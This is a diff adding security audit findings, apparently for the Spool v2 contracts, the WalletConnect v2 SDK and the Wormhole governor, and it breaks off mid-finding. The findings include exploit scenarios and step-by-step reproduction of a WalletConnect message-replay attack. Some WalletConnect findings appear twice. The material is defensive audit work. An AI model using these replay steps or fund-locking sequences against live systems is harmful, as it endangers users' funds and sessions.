As a result, it will be difficult to review the correct behavior of the contracts once they have been deployed. Events generated during contract execution aid in monitoring, baselining of behavior, and detection of suspicious activity. Without events, users and blockchain-monitoring systems cannot easily detect behavior that falls outside the baseline conditions. This may prevent malfunctioning contracts or attacks from being detected. The following operations should trigger events: ● SpoolAccessControl.grantSmartVaultOwnership ● ActionManager.setActions ● SmartVaultManager.registerSmartVault ● SmartVaultManager.removeStrategy ● SmartVaultManager.syncSmartVault ● SmartVaultManager.reallocate ● StrategyRegistry.registerStrategy ● StrategyRegistry.removeStrategy ● StrategyRegistry.doHardWork ● StrategyRegistry.setEcosystemFee ● StrategyRegistry.setEcosystemFeeReceiver ● StrategyRegistry.setTreasuryFee ● StrategyRegistry.setTreasuryFeeReceiver ● Strategy.doHardWork ● RewardManager.addToken ● RewardManager.extendRewardEmission Exploit Scenario The Spool system experiences a security incident, but the Spool team has trouble reconstructing the sequence of events causing the incident because of missing log information. Recommendations Short term, add events for all operations that may contribute to a higher level of monitoring and alerting. Long term, consider using a blockchain-monitoring system to track any suspicious behavior in the contracts. The system relies on several contracts to behave as expected. A monitoring mechanism for critical events would quickly detect any compromised system components. +33. Removal of a strategy could result in loss of funds Severity: Medium Difficulty: Medium Type: Undefined Behavior Finding ID: TOB-SPL-33 Target: managers/SmartVaultManager.sol Description A Spool admin can remove a strategy from the system, which will be replaced by a ghost strategy in all smart vaults that use it; however, if a strategy is removed when the system is in specific states, funds to be deposited or withdrawn in the next “do hard work” cycle will be lost. If the following sequence of events occurs, the asset deposited will be lost from the removed strategy: 1. A user deposits assets into a smart vault. 2. The flush function is called. The StrategyRegistry._assetsDeposited[strategy][xxx][yyy] storage variable now has assets to send to the given strategy in the next “do hard work” cycle. 3. The strategy is removed. 4. doHardWork is called, but the assets for the removed strategy are locked in the master wallet because the function can be called only for valid strategies. If the following sequence of events occurs, the assets withdrawn from a removed strategy will be lost: 1. doHardWork is called. 2. The strategy is removed before a smart vault sync is done. Exploit Scenario Multiple smart vaults use strategy A. Users deposited a total of $1 million, and $300,000 should go to strategy A. Strategy A is removed due to an issue in the third-party protocol. All of the $300,000 is locked in the master wallet. Recommendations Short term, modify the associated code to properly handle deposited and withdrawn funds when strategies are removed. Long term, improve the system’s unit and integration tests: consider all of the possible transaction sequences in the system’s state and test them to ensure their correct behavior. +34. ExponentialAllocationProvider reverts on strategies without risk scores Severity: Medium Difficulty: Medium Type: Data Validation Finding ID: TOB-SPL-34 Target: providers/ExponentialAllocationProvider.sol Description The ExponentialAllocationProvider.calculateAllocation function can revert due to division-by-zero error when a strategy’s risk score has not been set by the risk provider. The risk variable in calculateAllocation represents the risk score set by the risk provider for the given strategy, represented by the index i . Ghost strategies can be passed to the function. If a ghost strategy’s risk score has not been set (which is likely, as there would be no reason to set one), the function will revert with a division-by-zero error. function calculateAllocation(AllocationCalculationInput calldata data) external pure returns ( uint256 [] memory ) { if (data.apys.length != data.riskScores.length) { revert ApysOrRiskScoresLengthMismatch(data.apys.length, data.riskScores.length); } [...] for ( uint8 i; i < data.apys.length; ++i) { [...] int256 risk = fromUint(data.riskScores[i]); results[i] = uint256 ( div(apy, risk) ); resultSum += results[i]; } Figure 34.1: A snippet of the calculateAllocation function in spool-v2-core/ExponentialAllocationProvider.sol#L309–L340 Exploit Scenario A strategy is removed from a smart vault that uses the ExponentialAllocationProvider contract. Bob, who has the ROLE_ALLOCATOR role, calls reallocate ; however, it reverts, and the smart vault is impossible to reallocate. Recommendations Short term, modify the calculateAllocation function so that it properly handles strategies with uninitialized risk scores. Long term, improve the unit and integration tests for the allocators. Refactor the codebase so that ghost strategies are not passed to the calculateAllocator function. +35. Removing a strategy makes the smart vault unusable Severity: Medium Difficulty: High Type: Data Validation Finding ID: TOB-SPL-35 Target: managers/DepositManager.sol Description Removing a strategy from a smart vault causes every subsequent deposit transaction to revert, making the smart vault unusable. The deposit function of the SmartVaultManager contract calls the depositAssets function on the DepositManager contract. The depositAssets function calls the checkDepositRatio function, which takes an argument called strategyRatios : function depositAssets(DepositBag calldata bag, DepositExtras calldata bag2) external onlyRole(ROLE_SMART_VAULT_MANAGER, msg.sender ) returns ( uint256 [] memory , uint256 ) { ... // check if assets are in correct ratio checkDepositRatio( bag.assets, SpoolUtils.getExchangeRates(bag2.tokens, _priceFeedManager), bag2.allocations, SpoolUtils.getStrategyRatiosAtLastDhw(bag2.strategies, _strategyRegistry) ); ... return (_vaultDeposits[bag.smartVault][bag2.flushIndex].toArray(bag2.tokens.length), depositId); } Figure 35.1: The depositAssets function in spool-v2-core/DepositManager.sol The value of strategyRatios is fetched from the StrategyRegistry contract, which returns an empty array on ghost strategies. This empty array is then used in a for loop in the calculateFlushFactors function: function calculateFlushFactors( uint256 [] memory exchangeRates, uint16a16 allocation, uint256 [][] memory strategyRatios ) public pure returns ( uint256 [][] memory ) { uint256 [][] memory flushFactors = new uint256 [][](strategyRatios.length); // loop over strategies for ( uint256 i; i < strategyRatios.length; ++i) { flushFactors[i] = new uint256 [](exchangeRates.length); uint256 normalization = 0; // loop over assets for ( uint256 j = 0; j < exchangeRates.length; j++) { normalization += strategyRatios[i][j] * exchangeRates[j]; } // loop over assets for ( uint256 j = 0; j < exchangeRates.length; j++) { flushFactors[i][j] = allocation.get(i) * strategyRatios[i][j] * PRECISION_MULTIPLIER / normalization; } } return flushFactors; } Figure 35.2: The calculateFlushFactors function in spool-v2-core/DepositManager.sol The statement calculating the value of normalization tries to access an index of the empty array and reverts with the Index out of bounds error, causing the deposit function to revert for every transaction thereafter. Exploit Scenario A Spool admin removes a strategy from a smart vault. Because of the presence of a ghost strategy, users’ deposit transactions into the smart vault revert with the Index out of bounds error. Recommendations Short term, modify the calculateFlushFactors function so that it skips ghost strategies in the loop used to calculate the value of normalization . Long term, review the entire codebase, check the effects of removing strategies from smart vaults, and ensure that all of the functionality works for smart vaults with one or more ghost strategies. +36. Issues with the management of access control roles in deployment script Severity: Low Difficulty: Low Type: Access Controls Finding ID: TOB-SPL-36 Target: script/DeploySpool.s.sol Description The deployment script does not properly manage or assign access control roles. As a result, the protocol will not work as expected, and the protocol’s contracts cannot be upgraded. The deployment script has multiple issues regarding the assignment or transfer of access control roles. It fails to grant certain roles and to revoke temporary roles on deployment: ● ● ● ● ● Ownership of the ProxyAdmin contract is not transferred to an EOA, multisig wallet, or DAO after the system is deployed, making the smart contracts non-upgradeable. The DEFAULT_ADMIN_ROLE role is not transferred to an EOA, multisig wallet, or DAO after the system is deployed, leaving no way to manage roles after deployment. The ADMIN_ROLE_STRATEGY role is not assigned to the StrategyRegistry contract, which is required to grant the ROLE_STRATEGY role to a strategy contract. Because of this, new strategies cannot be registered. The ADMIN_ROLE_SMART_VAULT_ALLOW_REDEEM role is not assigned to the SmartVaultFactory contract, which is required to grant the ROLE_SMART_VAULT_ALLOW_REDEEM role to smartVault contracts. The ROLE_SMART_VAULT_MANAGER and ROLE_MASTER_WALLET_MANAGER roles are not assigned to the DepositManager and WithdrawalManager contracts, making them unable to move funds from the master wallet contract. We also found that the ROLE_SMART_VAULT_ADMIN role is not assigned to the smart vault owner when a new smart vault is created. This means that smart vault owners will not be able to manage their smart vaults. Exploit Scenario The Spool team deploys the smart contracts using the deployment script, but due to the issues described in this finding, the team is not able to perform the role management and upgrades when required. Recommendations Short term, modify the deployment script so that it does the following on deployment: ● ● ● ● Transfers ownership of the proxyAdmin contract to an EOA, multisig wallet, or DAO Transfers the DEFAULT_ADMIN_ROLE role to an EOA, multisig wallet, or DAO Grants the required roles to the smart contracts Allow the SmartVaultFactory contract to grant the ROLE_SMART_VAULT_ADMIN role to owners of newly created smart vaults Long term, document all of the system’s roles and interactions between components that require privileged roles. Make sure that all of the components are granted their required roles following the principle of least privilege to keep the protocol secure and functioning as expected. +37. Risk of DoS due to unbounded loops Severity: Medium Difficulty: High Type: Data Validation Finding ID: TOB-SPL-37 Target: managers/SmartVaultManager.sol Description Guards and actions are run in unbounded loops. A smart vault creator can add too many guards and actions, potentially trapping the deposit and withdrawal functionality due to a lack of gas. The runGuards function calls all the configured guard contracts in a loop: function runGuards( address smartVaultId, RequestContext calldata context) external view { if (guardPointer[smartVaultId][context.requestType] == address (0)) { return ; } GuardDefinition[] memory guards = _readGuards(smartVaultId, context.requestType); for ( uint256 i; i < guards.length; ++i) { GuardDefinition memory guard = guards[i]; bytes memory encoded = _encodeFunctionCall(smartVaultId, guard, context); ( bool success, bytes memory data) = guard.contractAddress.staticcall(encoded); _checkResult(success, data, guard.operator, guard.expectedValue, i); } } Figure 37.1: The runGuards function in spool-v2-core/GuardManager.sol Multiple conditions can cause this loop to run out of gas: ● ● ● The vault creator adds too many guards. One of the guard contracts consumes a high amount of gas. A guard starts consuming a high amount of gas after a specific block or at a specific state. If user transactions reach out-of-gas errors due to these conditions, smart vaults can become unusable, and funds can become stuck in the protocol. A similar issue affects the runActions function in the AuctionManager contract. Exploit Scenario Eve creates a smart vault with an upgradeable guard contract. Later, when users have made large deposits, Eve upgrades the guard contract to consume all of the available gas to trap user deposits in the smart vault for as long as she wants. Recommendations Short term, model all of the system's variable-length loops, including the ones used by runGuards and runActions , to ensure they cannot block contract execution within expected system parameters. Long term, carefully audit operations that consume a large amount of gas, especially those in loops. +38. Unsafe casts throughout the codebase Severity: Undetermined Difficulty: Undetermined Type: Data Validation Finding ID: TOB-SPL-38 Target: src/ Description The codebase contains unsafe casts that could cause mathematical errors if they are reachable in certain states. Examples of possible unsafe casts are shown in figures 38.1 and 38.2. function flushSmartVault( address smartVault, uint256 flushIndex, address [] calldata strategies, uint16a16 allocation, address [] calldata tokens ) external returns (uint16a16) { [...] _flushShares[smartVault][flushIndex].flushSvtSupply = uint128(ISmartVault(smartVault).totalSupply()) ; return _strategyRegistry.addDeposits(strategies, distribution); } Figure 38.1: A possible unsafe cast in spool-v2-core/DepositManager.sol#L220 function syncDeposits( address smartVault, uint256 [3] calldata bag, // uint256 flushIndex, // uint256 lastDhwSyncedTimestamp, // uint256 oldTotalSVTs, address [] calldata strategies, uint16a16[2] calldata dhwIndexes, address [] calldata assetGroup, SmartVaultFees calldata fees ) external returns (DepositSyncResult memory ) { [...] if (syncResult.mintedSVTs > 0) { _flushShares[smartVault][bag[0]].mintedVaultShares = uint128 (syncResult.mintedSVTs) ; [...] } return syncResult; } Figure 38.2: A possible unsafe cast in spool-v2-core/DepositManager.sol#L243 Recommendations Short term, review the codebase to identify all of the casts that may be unsafe. Analyze whether these casts could be a problem in the current codebase and, if they are unsafe, make the necessary changes to make them safe. Long term, when implementing potentially unsafe casts, always include comments to explain why those casts are safe in the context of the codebase. diff --git a/findings_newupdate/tob/2023-03-walletconnectv2-securityreview.txt b/findings_newupdate/tob/2023-03-walletconnectv2-securityreview.txt new file mode 100644 index 0000000..412d0c2 --- /dev/null +++ b/findings_newupdate/tob/2023-03-walletconnectv2-securityreview.txt @@ -0,0 +1,7 @@ +1. Use of outdated dependencies Severity: Informational Difficulty: Undetermined Type: Patching Finding ID: TOB-WCSDK-1 Target: walletconnect-monorepo , walletconnect-utils Description We used npm audit and lerna-audit to detect the use of outdated dependencies in the codebase. These tools discovered a number of vulnerable packages that are referenced by the package-lock.json files. The following tables describe the vulnerable dependencies used in the walletconnect-utils and walletconnect-monorepo repositories : walletconnect-utils Dependencies Vulnerability Report Vulnerability Description Vulnerable Versions glob-parent CVE-2020-28469 Regular expression denial of service in enclosure regex < 5.1.2 minimatch CVE-2022-3517 Regular expression denial of service when calling the braceExpand function with specific arguments < 3.0.5 nanoid CVE-2021-23566 Exposure of sensitive information to an unauthorized actor in nanoid 3.0.0–3.1. walletconnect-monorepo Dependencies Vulnerability Report Vulnerability Description Vulnerable Versions flat CVE-2020-36632 flat vulnerable to prototype pollution minimatch CVE-2022-3517 request CVE-2023-28155 Regular expression denial of service when calling the braceExpand function with specific arguments Bypass of SSRF mitigations via an attacker-controller server that does a cross-protocol redirect (HTTP to HTTPS, or HTTPS to HTTP) < 5.0.1 < 3.0.5 <= 2.88.2 In many cases, the use of a vulnerable dependency does not necessarily mean the application is vulnerable. Vulnerable methods from such packages need to be called within a particular (exploitable) context. To determine whether the WalletConnect SDK is vulnerable to these issues, each issue will have to be manually triaged. While these specific libraries were outdated at the time of the review, there were already checks in place as part of the CI/CD pipeline of application development of WalletConnect to keep track of these issues. Recommendations Short term, update the project dependencies to their latest versions wherever possible. Use tools such as retire.js , npm audit , and yarn audit to confirm that no vulnerable dependencies remain. +2. No protocol-level replay protections in WalletConnect Severity: Undetermined Difficulty: High Type: Cryptography Finding ID: TOB-WCSDK-2 Target: WalletConnect v2 protocol Description Applications and wallets using WalletConnect v2 can exchange messages using the WalletConnect protocol through a public WebSocket relay server. Exchanged data is encrypted and authenticated with keys unknown to the relay server. However, using dynamic testing during the audit, we observed that the protocol does not protect against replay attacks. The WalletConnect authentication protocol is essentially a challenge-response protocol between users and servers, where users produce signatures using the private keys from their wallets. A signature is performed over a message containing, among many other components, a nonce value chosen by the server. This nonce value is intended presumably to prevent an adversary from replaying an old signature that a user generated to authenticate themselves. However, there does not seem to be any validation against this nonce value (except validation that it exists), so the library would accept replayed signatures. In addition to missing validation of the nonce value, the payload for the signature does not appear to include the pairing topic for the pairing established between a user and the server. Because the authentication protocol runs only over an existing pairing, it would make sense to include the pairing topic value inside the signature payload. Doing so would prevent a malicious user from replaying another user’s previously generated signature for a new pairing that they establish with the server. To repeat our experiment that uncovered this issue, pair the React App demo application with the React Wallet demo application and intercept the traffic generated from the React App demo application (e.g., use a local proxy such as BurpSuite). Initiate a transaction from the application, capture the data sent through the WebSocket channel, and confirm the transaction in the wallet. A sample captured message is shown in figure 2.1. Now, edit the message field slightly and add “==” to the end of the string (“=” is the Base64 padding character). Finally, replay (resend) the captured data. A new confirmation dialog box should appear in the wallet. { "id" : 1680643717702847 , "jsonrpc" : "2.0" , "method" : "irn_publish" , "params" : { "topic" : "42507dee006fe8(...)2d797cccf8c71fa9de4" , "message" : "AFv70BclFEn6MteTRFemaxD7Q7(...)y/eAPv3ETRHL0x86cJ6iflkIww" , "ttl" : 300 , "prompt" : true , "tag" : 1108 } } Figure 2.1: A sample message sent from the dApp This finding is of undetermined severity because it is not obvious whether and how an attacker could use this vulnerability to impact users. When this finding was originally presented to the WalletConnect team, the recommended remediation was to track and enforce the correct nonce values. However, due to the distributed nature of the WalletConnect system, this could prove difficult in practice. In response, we have updated our recommendation to use timestamps instead. Timestamps are not as effective as nonces are for preventing replay attacks because it is not always possible to have a secure clock that can be relied upon. However, if nonces are infeasible to implement, timestamps are the next best option. Recommendations Short term, update the implementation of the authentication protocol to include timestamps in the signature payload that are then checked against the current time (within a reasonable window of time) upon signature validation. In addition to this, include the pairing topic in the signature payload. Long term, consider including all relevant pairing and authentication data in the signature payload, such as sender and receiver public keys. If possible, consider using nonces instead of timestamps to more effectively prevent replay attacks. +3. Key derivation code could produce keys composed of all zeroes Severity: Informational Difficulty: High Type: Cryptography Finding ID: TOB-WCSDK-3 Target: walletconnect-monorepo/packages/utils/src/crypto.ts Description The current implementation of the code that derives keys using the x25519 library does not enable the rejectZero option. If the counterparty is compromised, this may result in a derived key composed of all zeros, which could allow an attacker to observe or tamper with the communication. export function deriveSymKey(privateKeyA: string , publicKeyB: string ): string { const sharedKey = x25519.sharedKey( fromString(privateKeyA, BASE16), fromString(publicKeyB, BASE16), ); const hkdf = new HKDF(SHA256, sharedKey); const symKey = hkdf.expand(KEY_LENGTH); return toString(symKey, BASE16); } Figure 3.1: The code that derives keys using x25519.sharedKey ( walletconnect-monorepo/packages/utils/src/crypto.ts#35–43 ) The x25519 library includes a warning about this case: /** * Returns a shared key between our secret key and a peer's public key. * * Throws an error if the given keys are of wrong length. * * If rejectZero is true throws if the calculated shared key is all-zero . * From RFC 7748: * * > Protocol designers using Diffie-Hellman over the curves defined in * > this document must not assume "contributory behavior". Specially, * > contributory behavior means that both parties' private keys * > contribute to the resulting shared key. Since curve25519 and * > curve448 have cofactors of 8 and 4 (respectively), an input point of * > small order will eliminate any contribution from the other party's * > private key. This situation can be detected by checking for the all- * > zero output, which implementations MAY do, as specified in Section 6. * > However, a large number of existing implementations do not do this. * * IMPORTANT: the returned key is a raw result of scalar multiplication. * To use it as a key material, hash it with a cryptographic hash function. */ Figure 3.2: Warnings in x25519.sharedKey ( stablelib/packages/x25519/x25519.ts#595–615 ) This finding is of informational severity because a compromised counterparty would already allow an attacker to observe or tamper with the communication. Exploit Scenario An attacker compromises the web server on which a dApp is hosted and introduces malicious code in the front end that makes it always provide a low-order point during the key exchange. When a user connects to this dApp with their WalletConnect-enabled wallet, the derived key is all zeros. The attacker passively captures and reads the exchanged messages. Recommendations Short term, enable the rejectZero flag for uses of the deriveSymKey function. Long term, when using cryptographic primitives, research any edge cases they may have and always review relevant implementation notes. Follow recommended practices and include any defense-in-depth safety checks to ensure the protocol operates as intended. +1. Use of outdated dependencies Severity: Informational Difficulty: Undetermined Type: Patching Finding ID: TOB-WCSDK-1 Target: walletconnect-monorepo , walletconnect-utils Description We used npm audit and lerna-audit to detect the use of outdated dependencies in the codebase. These tools discovered a number of vulnerable packages that are referenced by the package-lock.json files. The following tables describe the vulnerable dependencies used in the walletconnect-utils and walletconnect-monorepo repositories : walletconnect-utils Dependencies Vulnerability Report Vulnerability Description Vulnerable Versions glob-parent CVE-2020-28469 Regular expression denial of service in enclosure regex < 5.1.2 minimatch CVE-2022-3517 Regular expression denial of service when calling the braceExpand function with specific arguments < 3.0.5 nanoid CVE-2021-23566 Exposure of sensitive information to an unauthorized actor in nanoid 3.0.0–3.1. walletconnect-monorepo Dependencies Vulnerability Report Vulnerability Description Vulnerable Versions flat CVE-2020-36632 flat vulnerable to prototype pollution minimatch CVE-2022-3517 request CVE-2023-28155 Regular expression denial of service when calling the braceExpand function with specific arguments Bypass of SSRF mitigations via an attacker-controller server that does a cross-protocol redirect (HTTP to HTTPS, or HTTPS to HTTP) < 5.0.1 < 3.0.5 <= 2.88.2 In many cases, the use of a vulnerable dependency does not necessarily mean the application is vulnerable. Vulnerable methods from such packages need to be called within a particular (exploitable) context. To determine whether the WalletConnect SDK is vulnerable to these issues, each issue will have to be manually triaged. While these specific libraries were outdated at the time of the review, there were already checks in place as part of the CI/CD pipeline of application development of WalletConnect to keep track of these issues. Recommendations Short term, update the project dependencies to their latest versions wherever possible. Use tools such as retire.js , npm audit , and yarn audit to confirm that no vulnerable dependencies remain. +2. No protocol-level replay protections in WalletConnect Severity: Undetermined Difficulty: High Type: Cryptography Finding ID: TOB-WCSDK-2 Target: WalletConnect v2 protocol Description Applications and wallets using WalletConnect v2 can exchange messages using the WalletConnect protocol through a public WebSocket relay server. Exchanged data is encrypted and authenticated with keys unknown to the relay server. However, using dynamic testing during the audit, we observed that the protocol does not protect against replay attacks. The WalletConnect authentication protocol is essentially a challenge-response protocol between users and servers, where users produce signatures using the private keys from their wallets. A signature is performed over a message containing, among many other components, a nonce value chosen by the server. This nonce value is intended presumably to prevent an adversary from replaying an old signature that a user generated to authenticate themselves. However, there does not seem to be any validation against this nonce value (except validation that it exists), so the library would accept replayed signatures. In addition to missing validation of the nonce value, the payload for the signature does not appear to include the pairing topic for the pairing established between a user and the server. Because the authentication protocol runs only over an existing pairing, it would make sense to include the pairing topic value inside the signature payload. Doing so would prevent a malicious user from replaying another user’s previously generated signature for a new pairing that they establish with the server. To repeat our experiment that uncovered this issue, pair the React App demo application with the React Wallet demo application and intercept the traffic generated from the React App demo application (e.g., use a local proxy such as BurpSuite). Initiate a transaction from the application, capture the data sent through the WebSocket channel, and confirm the transaction in the wallet. A sample captured message is shown in figure 2.1. Now, edit the message field slightly and add “==” to the end of the string (“=” is the Base64 padding character). Finally, replay (resend) the captured data. A new confirmation dialog box should appear in the wallet. { "id" : 1680643717702847 , "jsonrpc" : "2.0" , "method" : "irn_publish" , "params" : { "topic" : "42507dee006fe8(...)2d797cccf8c71fa9de4" , "message" : "AFv70BclFEn6MteTRFemaxD7Q7(...)y/eAPv3ETRHL0x86cJ6iflkIww" , "ttl" : 300 , "prompt" : true , "tag" : 1108 } } Figure 2.1: A sample message sent from the dApp This finding is of undetermined severity because it is not obvious whether and how an attacker could use this vulnerability to impact users. When this finding was originally presented to the WalletConnect team, the recommended remediation was to track and enforce the correct nonce values. However, due to the distributed nature of the WalletConnect system, this could prove difficult in practice. In response, we have updated our recommendation to use timestamps instead. Timestamps are not as effective as nonces are for preventing replay attacks because it is not always possible to have a secure clock that can be relied upon. However, if nonces are infeasible to implement, timestamps are the next best option. Recommendations Short term, update the implementation of the authentication protocol to include timestamps in the signature payload that are then checked against the current time (within a reasonable window of time) upon signature validation. In addition to this, include the pairing topic in the signature payload. Long term, consider including all relevant pairing and authentication data in the signature payload, such as sender and receiver public keys. If possible, consider using nonces instead of timestamps to more effectively prevent replay attacks. +3. Key derivation code could produce keys composed of all zeroes Severity: Informational Difficulty: High Type: Cryptography Finding ID: TOB-WCSDK-3 Target: walletconnect-monorepo/packages/utils/src/crypto.ts Description The current implementation of the code that derives keys using the x25519 library does not enable the rejectZero option. If the counterparty is compromised, this may result in a derived key composed of all zeros, which could allow an attacker to observe or tamper with the communication. export function deriveSymKey(privateKeyA: string , publicKeyB: string ): string { const sharedKey = x25519.sharedKey( fromString(privateKeyA, BASE16), fromString(publicKeyB, BASE16), ); const hkdf = new HKDF(SHA256, sharedKey); const symKey = hkdf.expand(KEY_LENGTH); return toString(symKey, BASE16); } Figure 3.1: The code that derives keys using x25519.sharedKey ( walletconnect-monorepo/packages/utils/src/crypto.ts#35–43 ) The x25519 library includes a warning about this case: /** * Returns a shared key between our secret key and a peer's public key. * * Throws an error if the given keys are of wrong length. * * If rejectZero is true throws if the calculated shared key is all-zero . * From RFC 7748: * * > Protocol designers using Diffie-Hellman over the curves defined in * > this document must not assume "contributory behavior". Specially, * > contributory behavior means that both parties' private keys * > contribute to the resulting shared key. Since curve25519 and * > curve448 have cofactors of 8 and 4 (respectively), an input point of * > small order will eliminate any contribution from the other party's * > private key. This situation can be detected by checking for the all- * > zero output, which implementations MAY do, as specified in Section 6. * > However, a large number of existing implementations do not do this. * * IMPORTANT: the returned key is a raw result of scalar multiplication. * To use it as a key material, hash it with a cryptographic hash function. */ Figure 3.2: Warnings in x25519.sharedKey ( stablelib/packages/x25519/x25519.ts#595–615 ) This finding is of informational severity because a compromised counterparty would already allow an attacker to observe or tamper with the communication. Exploit Scenario An attacker compromises the web server on which a dApp is hosted and introduces malicious code in the front end that makes it always provide a low-order point during the key exchange. When a user connects to this dApp with their WalletConnect-enabled wallet, the derived key is all zeros. The attacker passively captures and reads the exchanged messages. Recommendations Short term, enable the rejectZero flag for uses of the deriveSymKey function. Long term, when using cryptographic primitives, research any edge cases they may have and always review relevant implementation notes. Follow recommended practices and include any defense-in-depth safety checks to ensure the protocol operates as intended. +4. Insecure storage of session data in local storage Severity: Medium Difficulty: High Type: Data Exposure Finding ID: TOB-WCSDK-4 Target: Browser storage Description HTML5 local storage is used to hold session data, including keychain values. Because there are no access controls on modifying and retrieving this data using JavaScript, data in local storage is vulnerable to XSS attacks. Figure 4.1: Keychain data stored in a browser’s localStorage Exploit Scenario Alice discovers an XSS vulnerability in a dApp that supports WalletConnect. This vulnerability allows Alice to retrieve the dApp’s keychain data, allowing her to propose new transactions to the connected wallet. Recommendations Short term, consider using cookies to store and send tokens. Enable cross-site request forgery (CSRF) libraries available to mitigate these attacks. Ensure that cookies are tagged with httpOnly , and preferably secure , to ensure that JavaScript cannot access them. References ● OWASP HTML5 Security Cheat Sheet: Local Storage A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and difficulty levels used in this document. Vulnerability Categories Category Description Access Controls Insufficient authorization or assessment of rights Auditing and Logging Insufficient auditing of actions or logging of problems Authentication Improper identification of users Configuration Misconfigured servers, devices, or software components Cryptography A breach of system confidentiality or integrity Data Exposure Exposure of sensitive information Data Validation Improper reliance on the structure or values of data Denial of Service A system failure with an availability impact Error Reporting Insecure or insufficient reporting of error conditions Patching Use of an outdated software package or library Session Management Improper identification of authenticated users Testing Timing Insufficient test methodology or test coverage Race conditions or other order-of-operations flaws Undefined Behavior Undefined behavior triggered within the system Severity Levels Severity Description Informational The issue does not pose an immediate risk but is relevant to security best practices. Undetermined The extent of the risk was not determined during this engagement. Low The risk is small or is not one the client has indicated is important. Medium High User information is at risk; exploitation could pose reputational, legal, or moderate financial risks. The flaw could affect numerous users and have serious reputational, legal, or financial implications. Difficulty Levels Difficulty Description Undetermined The difficulty of exploitation was not determined during this engagement. Low Medium High The flaw is well known; public tools for its exploitation exist or can be scripted. An attacker must write an exploit or will need in-depth knowledge of the system. An attacker must have privileged access to the system, may need to know complex technical details, or must discover other weaknesses to exploit this issue. B. Code Maturity Categories The following tables describe the code maturity categories and rating criteria used in this document. Code Maturity Categories Category Description Arithmetic The proper use of mathematical operations and semantics Auditing The use of event auditing and logging to support monitoring Authentication / Access Controls The use of robust access controls to handle identification and authorization and to ensure safe interactions with the system Complexity Management The presence of clear structures designed to manage system complexity, including the separation of system logic into clearly defined functions Configuration The configuration of system components in accordance with best practices Cryptography and Key Management The safe use of cryptographic primitives and functions, along with the presence of robust mechanisms for key generation and distribution Data Handling The safe handling of user inputs and data processed by the system Documentation The presence of comprehensive and readable codebase documentation Maintenance The timely maintenance of system components to mitigate risk Memory Safety and Error Handling The presence of memory safety and robust error-handling mechanisms Testing and Verification The presence of robust testing procedures (e.g., unit tests, integration tests, and verification methods) and sufficient test coverage Rating Criteria Rating Strong Description No issues were found, and the system exceeds industry standards. Satisfactory Minor issues were found, but the system is compliant with best practices. Moderate Some issues that may affect system safety were found. Weak Many issues that affect system safety were found. Missing A required component is missing, significantly affecting system safety. Not Applicable The category is not applicable to this review. Not Considered The category was not considered in this review. Further Investigation Required Further investigation is required to reach a meaningful conclusion. diff --git a/findings_newupdate/tob/2023-03-wormhole-securityreview.txt b/findings_newupdate/tob/2023-03-wormhole-securityreview.txt new file mode 100644 index 0000000..d81f95f --- /dev/null +++ b/findings_newupdate/tob/2023-03-wormhole-securityreview.txt @@ -0,0 +1,17 @@ +1. Lack of doc comments Severity: Informational Difficulty: High Type: Patching Finding ID: TOB-WORMGUWA-1 Target: node/pkg/governor/governor.go, various source files in node/pkg/watchers Description Publicly accessible functions within the governor and watcher code generally lack doc comments. Inadequately documented code can be misunderstood, which increases the likelihood of an improper bug fix or a mis-implemented feature. There are ten publicly accessible functions within governor.go. However, only one such function has a comment preceding it (see figure 1.1). // Returns true if the message can be published, false if it has been added to the pending list. func (gov *ChainGovernor) ProcessMsg(msg *common.MessagePublication) bool { Figure 1.1: node/pkg/governor/governor.go#L281–L282 Similarly, there are at least 28 publicly accessible functions among the non-evm watchers. However, only seven of them are preceded by doc comments, and only one of the seven is not in the Near watcher code (see figure 1.2). // GetLatestFinalizedBlockNumber() returns the latest published block. func (s *SolanaWatcher) GetLatestFinalizedBlockNumber() uint64 { Figure 1.2: node/pkg/watchers/solana/client.go#L846–L847 Go’s official documentation on doc comments states the following: A func’s doc comment should explain what the function returns or, for functions called for side effects, what it does. Exploit Scenario Alice, a Wormhole developer, implements a new node feature involving the governor. Alice misunderstands how the functions called by her new feature work. Alice introduces a vulnerability into the node as a result. Recommendations Short term, add doc comments to each function that are accessible from outside of the package in which the function is defined. This will facilitate code review and reduce the likelihood that a developer introduces a bug into the code because of a misunderstanding. Long term, regularly review code comments to ensure they are accurate. Documentation must be kept up to date to be beneficial. References ● Go Doc Comments +2. Fields protected by mutex are not documented Severity: Informational Difficulty: High Type: Patching Finding ID: TOB-WORMGUWA-2 Target: node/pkg/governor/governor.go Description The fields protected by the governor’s mutex are not documented. A developer adding functionality to the governor is unlikely to know whether the mutex must be locked for their application. The ChainGovernor struct appears in figure 2.1. The Wormhole Foundation communicated to us privately that the mutex protects the fields highlighted in yellow. Note that, because there are 13 fields in ChainGovernor (not counting the mutex itself), the likelihood of a developer guessing exactly the set of highlighted fields is small. type ChainGovernor struct { db logger mutex tokens tokensByCoinGeckoId chains msgsSeen db.GovernorDB *zap.Logger sync.Mutex map[tokenKey]*tokenEntry map[string][]*tokenEntry map[vaa.ChainID]*chainEntry map[string]bool // Key is hash, payload is consts transferComplete and transferEnqueued. []*common.MessagePublication int string int msgsToPublish dayLengthInMinutes coinGeckoQuery env nextStatusPublishTime time.Time nextConfigPublishTime time.Time statusPublishCounter int64 configPublishCounter int64 } Figure 2.1: node/pkg/governor/governor.go#L119–L135 Exploit Scenario Alice, a Wormhole developer, adds a new function to the governor. ● Case 1: Alice does not lock the mutex, believing that her function operates only on fields that are not protected by the mutex. However, by not locking the mutex, Alice introduces a race condition into the governor. ● Case 2: Alice locks the mutex “just to be safe.” However, the fields on which Alice’s function operates are not protected by the mutex. Alice introduces a deadlock into the code as a result. Recommendations Short term, document the fields within ChainGovernor that are protected by the mutex. This will reduce the likelihood that a developer incorrectly locks, or does not lock, the mutex. Long term, regularly review code comments to ensure they are accurate. Documentation must be kept up to date to be beneficial. +3. Potential nil pointer dereference in reloadPendingTransfer Severity: Low Difficulty: High Type: Data Validation Finding ID: TOB-WORMGUWA-3 Target: node/pkg/governor/governor_db.go Description A potential nil pointer dereference exists in reloadPendingTransfer. The bug could be triggered if invalid data were stored within a node’s database, and could make it impossible to restart the node. The relevant code appears in figures 3.1 and 3.2 When DecodeTransferPayloadHdr returns an error, the payload that is also returned is used to construct the error message (figure 3.1). However, as shown in figure 3.2, the returned payload can be nil. payload, err := vaa.DecodeTransferPayloadHdr(msg.Payload) if err != nil { gov.logger.Error("cgov: failed to parse payload for reloaded pending transfer, dropping it", zap.String("MsgID", msg.MessageIDString()), zap.Stringer("TxHash", msg.TxHash), zap.Stringer("Timestamp", 